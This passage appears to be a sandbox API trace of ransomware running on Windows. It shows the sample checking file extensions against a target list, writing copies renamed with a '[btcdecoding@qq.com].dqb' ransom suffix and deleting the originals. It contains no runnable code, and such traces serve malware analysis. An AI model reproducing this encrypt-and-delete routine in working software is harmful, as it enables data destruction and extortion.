hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.222] SetEndOfFile (hFile=0x1f8) returned 1 [0046.222] CloseHandle (hObject=0x1f8) returned 1 [0046.222] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.222] SetEndOfFile (hFile=0x228) returned 1 [0046.223] CloseHandle (hObject=0x228) returned 1 [0046.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.223] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1 [0046.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.223] lstrlenW (lpString=".doc") returned 4 [0046.223] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.224] lstrlenW (lpString=".docx") returned 5 [0046.224] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.224] lstrlenW (lpString=".pdf") returned 4 [0046.224] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString=".xls") returned 4 [0046.224] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString=".xlsx") returned 5 [0046.224] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.224] lstrlenW (lpString=".ppt") returned 4 [0046.224] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString=".zip") returned 4 [0046.224] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString=".rar") returned 4 [0046.224] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString=".bz2") returned 4 [0046.224] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.224] lstrlenW (lpString=".7z") returned 3 [0046.224] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString=".dbf") returned 4 [0046.224] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString=".1cd") returned 4 [0046.224] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString=".jpg") returned 4 [0046.224] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.224] lstrlenW (lpString=".doc") returned 4 [0046.224] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.224] lstrlenW (lpString=".docx") returned 5 [0046.224] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.224] lstrlenW (lpString=".pdf") returned 4 [0046.225] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.225] lstrlenW (lpString=".xls") returned 4 [0046.225] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.225] lstrlenW (lpString=".xlsx") returned 5 [0046.225] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.225] lstrlenW (lpString=".ppt") returned 4 [0046.225] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.225] lstrlenW (lpString=".zip") returned 4 [0046.225] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.225] lstrlenW (lpString=".rar") returned 4 [0046.225] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.225] lstrlenW (lpString=".bz2") returned 4 [0046.225] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.225] lstrlenW (lpString=".7z") returned 3 [0046.225] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.225] lstrlenW (lpString=".dbf") returned 4 [0046.225] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.225] lstrlenW (lpString=".1cd") returned 4 [0046.225] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.225] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0046.225] lstrlenW (lpString=".jpg") returned 4 [0046.225] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.225] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0046.225] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.230] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1571) returned 1 [0046.230] CloseHandle (hObject=0x228) returned 1 [0046.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 0x20 [0046.231] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.231] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.231] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.262] GetLastError () returned 0x0 [0046.262] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x623, lpOverlapped=0x0) returned 1 [0046.274] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x630, lpOverlapped=0x0) returned 1 [0046.275] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.275] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.275] SetEndOfFile (hFile=0x1f8) returned 1 [0046.275] CloseHandle (hObject=0x1f8) returned 1 [0046.275] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.275] SetEndOfFile (hFile=0x228) returned 1 [0046.276] CloseHandle (hObject=0x228) returned 1 [0046.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.276] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif")) returned 1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString=".doc") returned 4 [0046.277] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.277] lstrlenW (lpString=".docx") returned 5 [0046.277] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.277] lstrlenW (lpString=".pdf") returned 4 [0046.277] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.277] lstrlenW (lpString=".xls") returned 4 [0046.277] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.277] lstrlenW (lpString=".xlsx") returned 5 [0046.277] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.277] lstrlenW (lpString=".ppt") returned 4 [0046.277] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString=".zip") returned 4 [0046.277] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.277] lstrlenW (lpString=".rar") returned 4 [0046.277] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.277] lstrlenW (lpString=".bz2") returned 4 [0046.277] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.277] lstrlenW (lpString=".7z") returned 3 [0046.277] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString=".dbf") returned 4 [0046.277] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString=".1cd") returned 4 [0046.277] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.277] lstrlenW (lpString=".jpg") returned 4 [0046.278] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString=".doc") returned 4 [0046.278] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.278] lstrlenW (lpString=".docx") returned 5 [0046.278] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.278] lstrlenW (lpString=".pdf") returned 4 [0046.278] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString=".xls") returned 4 [0046.278] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString=".xlsx") returned 5 [0046.278] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.278] lstrlenW (lpString=".ppt") returned 4 [0046.278] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString=".zip") returned 4 [0046.278] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString=".rar") returned 4 [0046.278] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.278] lstrlenW (lpString=".bz2") returned 4 [0046.278] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.278] lstrlenW (lpString=".7z") returned 3 [0046.278] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString=".dbf") returned 4 [0046.278] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString=".1cd") returned 4 [0046.278] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF") returned 76 [0046.278] lstrlenW (lpString=".jpg") returned 4 [0046.278] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.279] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0046.279] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.292] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=30170) returned 1 [0046.293] CloseHandle (hObject=0x228) returned 1 [0046.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 0x20 [0046.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.294] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.294] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.294] GetLastError () returned 0x0 [0046.294] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x75da, lpOverlapped=0x0) returned 1 [0046.316] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x75e0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x75e0, lpOverlapped=0x0) returned 1 [0046.317] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.318] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.318] SetEndOfFile (hFile=0x1f8) returned 1 [0046.318] CloseHandle (hObject=0x1f8) returned 1 [0046.318] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.318] SetEndOfFile (hFile=0x228) returned 1 [0046.319] CloseHandle (hObject=0x228) returned 1 [0046.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0046.319] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png")) returned 1 [0046.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.319] lstrlenW (lpString=".doc") returned 4 [0046.319] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.319] lstrlenW (lpString=".docx") returned 5 [0046.319] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.319] lstrlenW (lpString=".pdf") returned 4 [0046.319] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.319] lstrlenW (lpString=".xls") returned 4 [0046.319] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.319] lstrlenW (lpString=".xlsx") returned 5 [0046.319] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.319] lstrlenW (lpString=".ppt") returned 4 [0046.320] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".zip") returned 4 [0046.320] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.320] lstrlenW (lpString=".rar") returned 4 [0046.320] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.320] lstrlenW (lpString=".bz2") returned 4 [0046.320] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString=".7z") returned 3 [0046.320] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".dbf") returned 4 [0046.320] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".1cd") returned 4 [0046.320] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".jpg") returned 4 [0046.320] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".doc") returned 4 [0046.320] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString=".docx") returned 5 [0046.320] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.320] lstrlenW (lpString=".pdf") returned 4 [0046.320] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.320] lstrlenW (lpString=".xls") returned 4 [0046.320] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.320] lstrlenW (lpString=".xlsx") returned 5 [0046.320] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.320] lstrlenW (lpString=".ppt") returned 4 [0046.320] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.320] lstrlenW (lpString=".zip") returned 4 [0046.321] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.321] lstrlenW (lpString=".rar") returned 4 [0046.321] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.321] lstrlenW (lpString=".bz2") returned 4 [0046.321] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.321] lstrlenW (lpString=".7z") returned 3 [0046.321] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.321] lstrlenW (lpString=".dbf") returned 4 [0046.321] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.321] lstrlenW (lpString=".1cd") returned 4 [0046.321] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG") returned 77 [0046.321] lstrlenW (lpString=".jpg") returned 4 [0046.321] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.321] lstrcmpiW (lpString1=".CHM", lpString2=".dqb") returned -1 [0046.321] lstrlenW (lpString="VBENDF98.CHM") returned 12 [0046.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.322] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=72031) returned 1 [0046.322] CloseHandle (hObject=0x228) returned 1 [0046.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 0x20 [0046.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0046.322] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.322] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.323] GetLastError () returned 0x0 [0046.323] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x1195f, lpOverlapped=0x0) returned 1 [0046.326] WriteFile (in: hFile=0x1f8, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x11960, lpOverlapped=0x0) returned 1 [0046.327] ReadFile (in: hFile=0x228, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, 